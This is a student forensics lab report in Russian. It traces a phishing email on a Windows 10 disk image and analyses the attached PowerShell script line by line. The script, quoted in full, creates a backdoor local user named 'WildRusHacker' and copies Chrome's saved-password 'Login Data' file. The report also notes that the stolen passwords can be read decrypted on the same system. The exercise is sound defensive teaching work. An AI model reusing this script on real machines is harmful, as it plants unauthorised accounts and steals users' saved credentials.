Компьютерная экспертиза. Лабораторная работа №2 - Расследование кибер-инцидентов

# Компьютерная экспертиза. Лабораторная работа №2 - Расследование кибер-инцидентов > [name= Беличенко Д., Шабанова М. БСБО-04-19] #### Цель работы Получить навыки расследования кибер-инцидентов средствами утилит форензики, поиска следов злоумышленника в системе #### Входные данные Образ диска Windows 10, пользователь которого подвергся фишинговой атаке через электронную почту и потерял аккаунты, сохранённые в бразуере #### Задание: 1. Обнаружить фишинговое письмо 2. Обнаружить вредоносный код и проанализировать его действие 3. Выявить, какие данные были скомпрометированы --- ### 1. Обнаружение фишингового письма С помощью программы Autopsy (*программа с открытым исходным кодом, которая используется для выполнения криминалистических операций с жесткими дисками и смартфонами*) Необходимо выяснить, на какую почту пришло фишинговое письмо. Для этого зайдем в браузер, посмотрим историю и увидим, что у пользователя есть почта Yandex, Google, а также временная почта. Однако пароли не сохранены в браузере, поэтому зайти в них не получится. ![](https://i.imgur.com/zuK6YRz.png) Далее попытаемся найти почту в Параметрах Windows. Напишем в поиске почта и откроем пункт "Электронная почта и учетные записи". Можно увидеть, что в системе есть учётная запись alexmireaforensic_lab2@outlook.com, в которую был выполнен вход. ![](https://i.imgur.com/pG5tBSK.png) Поэтому можно открыть Outlook и посмотреть, что находится в разделе Inbox. Как раз здесь и находится наше фишинговое письмо. ![](https://i.imgur.com/RXnM8uM.png) ### 2. Обнаружение вредоносного кода и его анализ Проанализировав содержание письма, можно понять, что в файле, отправленном злоумышленником, будет находиться PowerShell-скрипт (в письме сказано, что необходимо поменять расщиерние с .txt на .ps1). ![](https://i.imgur.com/aUGb7ND.png) Откроем файл POSHE.txt и рассмотрим его построчно: - Создаётся переменная с паролем, который с помощью ConvertTo-SecureString преобразуется из обычного текста в защищённую строку. ```javascript=1 $PASSWORD= ConvertTo-SecureString -AsPlainText -Force -String Qq123456 ``` - Создаётся новый пользователь WildRusHacker с паролем, который был создан ранее ```javascript=2 New-LocalUser -Name "WildRusHacker" -Password $PASSWORD ``` - Создаётся новая папка WildRusHackerFolder в Program Files. ```javascript=3 New-Item -Path 'C:\Program Files\WildRusHackerFolder' -ItemType Directory ``` - Происходит копирование файла Login Data, в котором хранятся пароли из Google Chrome ```javascript=4 Copy-Item -Path "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" -Destination "C:\Program Files\WildRusHackerFolder\Login Data" ``` ### 3. Выявление скомпрометированных данных Исходя из последней строки вредоносного кода, можно понять, что скомпрометированными данными является файл Login Data, в котором находятся логины и пароли Google Chrome. :::info :bulb: **Login Data -** файл, который представляет из себя базу данных SQLite, которая состоит из 14 колонок. 3 основными колонками являются: origin_url (ссылка на сам сайт), username_value (логин), password_value(пароль). Пароль шифруется для текущей системы, поэтому при копировании файла на другой компьютер не получится узнать пароли, поскольку поля будут пустыми. ::: Откроем украденный файл с помощью DB Browser (SQLite) и посмотрим, что данные с сайтов Lamoda и Okko были украдены. ![](https://i.imgur.com/dR8DV5E.png) Так как мы находимся в системе, то можем посмотреть украденные данные в расшифрованном виде. ![](https://i.imgur.com/jFfQLaf.png)